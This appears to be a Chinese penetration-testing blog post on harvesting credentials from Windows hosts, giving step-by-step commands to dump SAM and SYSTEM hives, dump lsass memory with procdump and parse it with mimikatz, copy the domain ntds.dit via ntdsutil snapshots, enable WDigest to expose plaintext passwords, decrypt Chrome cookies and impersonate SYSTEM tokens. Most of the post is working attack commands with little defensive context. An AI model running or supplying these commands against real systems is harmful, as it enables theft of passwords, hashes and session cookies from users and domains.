windows信息搜集篇(三)之凭证收集

唔,已经到凭证收集了啊!

image

收集本机凭据是非常重要的环节.通常我们可以收集的凭据包括但不限于:Windows hash [NTLM,LM],浏览器密码、cookie 远程桌面密码 VPN密码 WLAN密码 IIS服务器密码 FTP密码等等.

WINDOWS密码

Windows密码加密后一般两种形式

NTLM哈希和LM哈希[VISTA和2008已经取消]这些哈希有两个存储位置,本地用户在SAM数据库,

域用户存储在域控制器的NTDS.dit数据库中.当用户登陆时,这些哈希也可能存储在内存中,能够被我们抓取到

SAM 是什么?

安全账号管理器-也就是存储用户密码的数据库文件,

他在windows/system32/config/SAM中,挂载在HKLM/SAM上.

为了防破解,windows核心版本NT4.0中引入了SYSTEM函数,SAM的磁盘上副本文件将被部分加密,以便存储在SAM中所有的本地账户immature哈希都使用密钥(成SYSKEY加密)。

提取SAM 数据库哈希方法,导出sam数据库中的密码

方法1:以管理员权限运行cmd,输入以下命令

reg save hklm\sam c:\sam.hive

reg save hklm\system c:\system.hive

image-20211205183444485

image-20211205183457807

方法2:使用powershell

Powershellery脚本下载地址

powershell -exec bypass
Import-Module .\invoke-ninjacopy.ps1
Invoke-NinjaCopy -Path C:\Windows\System32\config\SAM -LocalDestination .\sam.hive
Invoke-NinjaCopy -Path C:\Windows\System32\config\SYSTEM -LocalDestination .\system.hive

将生成的sam.hivesystem.hive转至本地,使用saminsidecain导入

saminside脚本之家下载地址

cain脚本之家下载链接

image-20211206145544837

结果如下:

image-20211206145954489

Procdump

官网下载链接

离线提取进行lsassvista及以上系统可以看到lsass进程, 右键创建转储文件.

Procdump.exe -ma lsass.exe lsass.dmp

获取到内存转储文件后,就可以使用mimikatz提取密码.

这里需要注意的是,运行mimikatz平台架构要与转储的系统兼容

Sekurlsa::minidump lsass.dmp

Sekurlsa::logonpasswords

导出域用户hash,访问域控的C:\Windows\NTDS文件夹

记录GUID并且替换之后的命令

ntdsutil snapshot “mount {GUID}” quit quit

C盘中会生成新目录,将其中的Windows\NTDS\ntds.dit拷贝出来

ntdsutil snapshot “unmount {GUID}” quit quit

ntdsutil snapshot " delete {GUID} " quit quit

使用Ntdsdumpex.exe提取hash

NTDSDumpEx下载链接

解压密码:zcgonvh

Ntdsdumpex.exe -r -d ntds.dit –o hash.txt

image-20211206150716041

如有设置密码则会生成相应的hash文件

image-20211206150755715

使用mimakatz获取hash与明文口令

privilege::debug

sekurlsa::logonPasswords

Windows 8.1Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997 补丁。

抓取到了NTLM后,破解MD5

尝试破解2-ophcrack

修改注册表,启用摘要密码支持

需要创建UseLogonCredential,并赋值为1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders \WDigest “UseLogonCredential”(DWORD)

重新登录后,再次运行就会直接抓取明文密码。

mimikatz提取chrome中保存的cookie

首先把chrome保存cookie的文件拷贝到桌面上方便操作,这个文件在

 C:\users\xxx\appdata\local\google\chrome\user data\default\cookies

image-20211206151704318

命令行下拷贝的命令是:

Copy 'C:\users\xxx\appdata\local\google\chrome\user data\default\cookies ’ c:\users\xxx\desktop

mimikatz_trunk文件包中有个x64文件夹,进入并打开mimikatz.exe,输入

image-20211206152317965

dpapi::chrome /in:c:\users\xxx\desktop\cookies /unprotect

image-20211206152131712

提取cookiemimikatztoken模块中的命令列出token,模仿system用户token
选择以管理员身份运行mimikatz.exe

privilege::debug #获取debug权限

token::elevate #模仿system用户的令牌

token::list #列出令牌

lsadump::sam #来获取sam数据库中的密码

token::revert #恢复令牌

image-20211206152509111

感言:

好吧,没有感言!

参考链接:
内网渗透测试的艺术[二]凭证收集

posted @ 2021-12-06 15:43  404p3rs0n  阅读(587)  评论(0编辑  收藏  举报